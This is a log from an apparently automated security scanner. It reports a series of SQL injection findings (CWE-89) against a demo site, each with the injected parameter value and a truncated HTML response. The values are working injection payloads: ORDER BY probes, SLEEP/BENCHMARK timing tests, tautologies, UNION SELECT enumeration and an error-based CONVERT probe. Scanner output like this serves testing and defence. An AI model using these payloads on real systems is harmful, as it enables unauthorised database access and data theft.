[3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1595\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 12#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1596\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nSensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryAlerts hints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1597\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# OR x=x--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1598\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# or 1=1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1599\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1600\nScan SQL InjectionSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ' or 'x'='x\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1601\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1602\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1603\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1604\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 23#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89Issue Number #1605\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# OR x=y#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1606\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 31337\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1607\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 1' ORDER BY 1,2,3--+\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1608\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1609\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+\nCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, 